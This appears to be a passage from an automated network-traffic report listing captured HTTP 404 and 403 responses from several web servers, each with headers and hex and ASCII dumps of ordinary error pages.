            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 
77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 
77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 
77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:21:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 
77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007678.23121635146216586X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:18 GMTX-Served-By: cache-dfw-kdfw8210035-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007680.75121635234316589X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:20 GMTX-Served-By: cache-dfw-kdfw8210133-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007683.192217429985716572X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:23 GMTX-Served-By: cache-dfw-kdfw8210062-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:32 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:34 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:37 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:39 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 